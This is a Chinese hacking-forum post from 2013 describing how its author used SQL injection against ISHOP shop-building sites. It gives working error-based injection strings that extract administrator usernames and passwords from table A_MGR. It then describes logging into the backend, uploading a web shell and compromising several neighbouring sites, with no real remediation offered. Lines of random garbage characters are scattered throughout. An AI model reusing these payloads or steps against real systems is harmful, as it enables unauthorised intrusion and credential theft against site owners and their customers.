中国网络渗透测试联盟
标题:
ISHOP商场建站系统注入漏洞
[打印本页]
作者:
admin
时间:
2013-4-4 17:40
标题:
ISHOP商场建站系统注入漏洞
发现一个注入点
) G$ F3 p3 H/ [) d; F
http://www.xxx.com
/Diary_A.asp?UBID=&DCID=DC2012050610553697&DIID=DI2012050610583389
9 y! I6 J" b1 L! I; H
* ~( g9 @4 k/ H5 v
习惯性的加’having1=1--
! [- A4 z+ h) v# @7 q# J
+ G1 C; l% ] _5 h& y
http://www.xxx.com.tw/Diary_A.asp?UBID=&DCID=DC2012050610553697&DIID=DI2012050610583389
’having 1=1—
4 N8 e& R% a, t4 a, D5 {
2 v; N% _- E$ u+ j! `( ?5 d$ `% k$ M
0
) x$ M2 c) F5 @! i5 J, v
4 l W: Z2 ^% {# P0 X- H
爆出Diary_A.dl_Title(这时候很激动啊)
- E: b* W6 G5 p9 b1 H/ b/ e2 [$ u
$ M. G c1 O o' [9 Q
那么继续
% H7 O0 F2 U/ I- g
http://www.xxx.com.tw/Diary_A.asp?UBID=&DCID=DC2012050610553697&DIID=DI2012050610583389
’group by dl_Title having 1=1—
' Q5 _) [: h' R
$ M" Q% m* R, I7 X) i1 F
继续,一直爆下去
3 s! `4 L$ {7 L! f* v; y5 W
6 N" A- R% O S( J) s6 k& S+ F
爆到几个字段和表段 但是没找到需要的管理用户的字段
. j& [9 `* p( A) j {& M3 _
% Y: x7 U: |# t: N, i4 l; V+ l7 Z/ _
蛋疼了 怎么办 然后去后台登陆页看源码
1 b6 p" N \7 K+ n9 s/ M
3 y- B( j0 ^. v6 O! t( q
0
+ \0 p9 K: [9 A1 ]3 |( v
; R- g6 v* F6 R% ?
Input name= “ADUID”
, p2 i; d. ~9 O$ {; N( ~) k
Input name= “ADPWD”
# u; Y; V+ C; E$ P( |7 f
2 y. Z8 O4 m* T, g8 g1 v, S
很幸运 找到了字段那就继续
7 y4 n3 r2 e* x! C7 i6 [& d8 k# t
找到之后开始爆用户
5 j$ s: E. T- |. \+ D2 v3 h3 ?# i3 G
http://www.xxx.com.tw/Diary_A.asp?UBID=&DCID=DC2012050610553697&DIID=DI2012050610583389'and
(select top 1 MGR_UID from A_MGR)>0—
1 k& m1 L1 x9 i+ |$ A) R) F
爆密码
& A* v# o" q' u9 z3 F" W
http://www.xxx.com.tw/Diary_A.asp?UBID=&DCID=DC2012050610553697&DIID=DI2012050610583389'and
(select top 1 MGR_PWD from A_MGR)>0—
. t/ q7 |, |) ?6 F+ j7 Q& m8 f
测试了下 这个注入点只能爆到文章哪里的表
" u" ]5 Q7 f8 k; [) q2 z* ~7 l; j
& f. I* ^! U2 p
头疼 继续 既然只能报道文章哪里的表去后台爆 不过后台字符限制了
0 A& T' ]+ _# H
. A" \ e* u3 b- ~. c5 J* Q) S
又想到 用户登录哪里也可以的吧就去试试 果然 今天我很幸运吧 爆出来了
& n& V. ?& a. ]- w9 A
1 U6 `) w% m7 A& \
473
2 r8 ^) d4 m$ S& M
- M2 m, \2 Y; r$ b
进后台
{$ ?- B" v' G! X" m/ ]1 b
5 ?8 L" y/ l I2 z% s, Q
8 }2 Z* |- A4 |) Z7 c
发现几个上传点 有的地方不能上传 而且防止恶意代码
1 T9 k$ Q5 k# f1 u0 H
* p+ @, w. ?4 W- Z
没办法 各种百度各种找大牛 找到一只好像可以突破的马
C; r# T f2 N6 f( N
& I5 ~( }( t4 A4 G4 w
& c& ? Y# r9 {; D- h
在系统管理那里直接上传 不过没有显示地址
2 Z) Z8 k1 u( {0 s& u
/ u5 n1 j) U: h' U' b
再上传一次 抓包 搞定OK
" T" W: q5 `, s# Q+ E1 b
! B( |. Q7 G7 E9 q0 d( l' Y! l, V6 n
/ L1 @" V+ ^2 e8 x' @9 |7 `" }* B
7 C- c: c/ j" n" E
472
# p+ @' i! d! V3 v$ C
6 M# J a# [6 S: K# m
晚上不行了 去睡觉。。。
3 `/ T. @! S7 n3 ~+ Q
第二天刚起床 闲的没事做继续日站吧
5 T: B$ g! ^/ Y5 m5 w w. ^
- L0 ]) }4 @3 f- s& r5 K* n* ~
找个站 就把这个站的旁c扫了下
8 P. G5 q8 \- p% b1 |" Y
8 t0 W) i; D% [$ k x
发现c段也有一个购物站 ,然后还和这个站的模板差不多
3 T* Z4 B5 b3 N. E @
$ }" @' x3 ^+ u9 k+ o- U! H. D
就找到会员登录口测试
- n/ Q; L# n/ [9 A/ ?3 {. J8 c
0 p, k3 E) f. \
'and (select top 1 MGR_UID from A_MGR)>0—
* b% H! ^4 W" r0 }( w
果断爆到了 这时候我很激动 通杀
9 V0 Q& F9 w, _4 ]0 q* k
) U2 i2 ]' T* Y/ }, ?# C
再次翻c段
- Q( f; E0 m' u4 J$ F0 S
. V2 I! y* t# O4 Q7 I) Q# k
翻出几个站 都成功拿下
2 n' z* a4 q4 @- O+ u# W/ B
' J- Y5 O1 h4 X; x; F7 ]
, C$ Y& g* {; a$ T$ E' w
6 x( N, z" } Q% D) P- b
修复方案:
: x0 s# e/ [- q. a+ k. L
他们比我专业
7 C) G' ^" t( O! q6 p3 C5 i& |8 U
s0 c% w7 v- H: w0 @
! U9 }5 Y0 |6 V4 h9 L) L: `
8 Q9 R I0 H V: m% [ n* |4 \8 Y Z
欢迎光临 中国网络渗透测试联盟 (https://www.cobjon.com/)
Powered by Discuz! X3.2